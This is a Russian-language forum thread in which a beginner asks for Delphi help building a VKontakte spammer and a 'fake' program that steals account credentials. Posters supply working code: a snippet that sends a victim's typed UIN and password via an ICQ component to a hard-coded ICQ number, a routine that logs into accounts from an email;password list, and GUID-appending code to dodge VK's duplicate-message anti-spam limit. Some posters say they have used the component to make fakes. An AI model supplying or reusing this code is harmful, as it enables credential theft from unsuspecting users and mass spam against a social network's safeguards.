Привет всем кто готов помоч и кто не готов... У меня возникло 2 вопроса: 1. Например мы выбрали строку в TListBox, теперь жмём кнопку и она вытаскивает "email до ;" "и пароль после ;" и вставляет его в соответсвующую графу TLabelEdit ну и собственно подставляет его в скрипт: Code: WebBrowser.Navigate('http://vkontakte.ru/login.php?email='+EmailEdit.Text+'&pass='+PasswordEdit.Text Подскажите как такое написать..? 2. Как можно сделать чтобы по Event - 'OnClick' отсылалась куда нить на сервер информация из TLabelEdit. Сегодня читал темы на форуме наткнулся на фейк MailAgent там же нашёл информацию про ICQ client в Delphi полазил по инэту про icq client нашёл прилично информации....но так и не понял даже как его установить, если кому нить не сложно объяснить как его установить, где его достать, и как он работает..буду благодарен... Всё в той же теме я нашёл такой скрипт: Code: procedure TForm1.ICQClient1Login(Sender: TObject); begin icqclient1.SendMessage(370355372, 'Уин: ' + ComboBox1.Text + ' Password: ' + Edit1.Text); end; Он как я понял отсылает...ComboBox1.Text & Edit1.Text в аську....вот я и подумал мб можно установить его себе, прикрепить к программе и собственно фейк готов...??? _/thread79328.html - вот та самая темка про фейк... подскажите как реализовать такое...?! З.Ы. прошу по голове не бить...в Delphi я еще bot , но пытаюсь учиться всему...что только можно...
юлин, народ, что у вас с религией??? Почему она вам поиском пользоваться не разрешает??? вот вторая строка в гугле при запросе ICQ client в Delphi, http://delphiexpert.ru/view_download.php?id=156. Вот тут лежит исходник icq клиента
Как установить TICQClient: 0) Удалите предыдущий компонент TICQClient, если ставили его 1) Откройте TICQClient.dpk в Delphi 2) Перейдите в Menu->Tools->Environment Options->Library 3) Нажмите кнопку "..." напротив Library path 4) Добавьте путь в папку, где лежит TICQClient 5) Вернитесь к окошку открытого dpk 6) Нажмите Compile 7) Нажмите Install 8) Теперь можете использовать компонент ICQClient на вкладке Samples
Пользовался нормально этим компонентом для создания фэйков но теперь вылетает ошибка Незнаете что она означает вернее перевести то я могу, а вот как избавится от нее, и в тулпалет дэлфи icqclient пропал!
***оффтоп TICQClient гавно, он глючный и старый. Что бы написать то что нужное для ICQ, можно потратить 2-3 дня на изучение протокола и 4 дня на реализацию задачи, чем неделями разбираться с ошибками и думать почему он работает не так как нужно
1. Code: procedure TForm1.Butto1Click(Sender: TObject); var email, pass, s: string; begin if ListBox1.ItemIndex>-1 then {Если в ЛистБоксе что-то выбрано} begin s:= ListBox1.Items.Strings[ListBox1.ItemIndex]; email:=Copy(s, 1, Pos(';', s)-1); {Берем часть строки s, до ;} Delete(s, 1, Pos(';', s));{Удаляем часть строки ;, включительно} pass:=s; WebBrowser.Navigate('http://vkontakte.ru/login.php?email='+email+'&pass='+pass; end; end; А вообще незнаю, что ты делаешь, но что-то не то.
В каком смысле не то? ну спамер ВК хочу) сделать) ну и собственно надо чтобы из listbox доставалось....а лист бокс грузит файл .txt, вот и вся задача собственно) А по второму вопросу...ни у кого нету предложений? помимо icq...?
У меня возник еще один вопросик...... Т.к. вконтакте щас есть одно ограничение, а именно ты не можешь отослать одно и то же сообщение, несколько раз подряд.....нужно прикрепить генерацию левых чисел или знаком.....кто нить может поделиться маленьким примером?
к последнему вопросу: Code: Uses ******, ActiveX; **************** function CreateGuid: string; var ID: TGUID; begin Result := ''; if CoCreateGuid(ID) = S_OK then Result := GUIDToString(ID); end; ******* s:='Это Спам, спам, спам, умри тупой юзер!!!!'+createguid; ******* 2. Можно на мыло отправлять. Что-то не то потому, что используешь WebBrowser, он грузит не только код страницы, но и картинки и флеш, и другую не нужную тебе хрень. Лучше и проше юзать IdHTTP.
Когда не знаешь, как с ним обращаться и даже не можешь норм HTTP Analizator найти и разобраться, то это сложно....говорю же я начинающий юзер..... Если не сложно, поподробнее что к чему хоть?) плизик) Code: Uses ******, ActiveX; **************** function CreateGuid: string; var ID: TGUID; begin Result := ''; if CoCreateGuid(ID) = S_OK then Result := GUIDToString(ID); end; ******* s:='Это Спам, спам, спам, умри тупой юзер!!!!'+createguid; ******* Не совсем понял....
аськоклиент вот - _ttp://progs.volkov.spb.su/ticqclient/ зы для установки открой файл *.dpk и справа клацни правой кнопкой мыши на имени файла, а потом по Install
Спасибо....посмотрим... У меня Delphi 2007, че то ругаеться у меня на установку аськоклиента(((( Вот что за бред? icqdb ставит а сам icqclient нет 1 иконка есть а второй нет :\
Code: Uses ******, ActiveX;// Нужная нам функция нахожится в ActiveX **************** function CreateGuid: string; //Функция для создания и перевода GUID в строку var ID: TGUID; //Переменная в которую создадим GUID begin Result := ''; // Просто на всякий случай. if CoCreateGuid(ID) = S_OK then // Если GUID нормально создался Result := GUIDToString(ID); // То результат переводим в string. end; ******* s:='Это Спам, спам, спам, умри тупой юзер!!!!'+createguid; //К нашей строке со спамом добавляем GUID ******* GUID (Globally Unique Identifier) — статистически уникальный 128-битный идентификатор. Его главная особенность — уникальность, которая позволяет создавать расширяемые сервисы и приложения без опасения конфликтов, вызванных совпадением идентификаторов. А если проше то - уникальная строка. Вот и всё! Просто таким образом составленое сообшение будет уникальным.
ICQclient во вкладке samples ставится, TICQ работает отлично коннектится за мгновение и работает быстро. А я для генерации символов использую рэндом чар))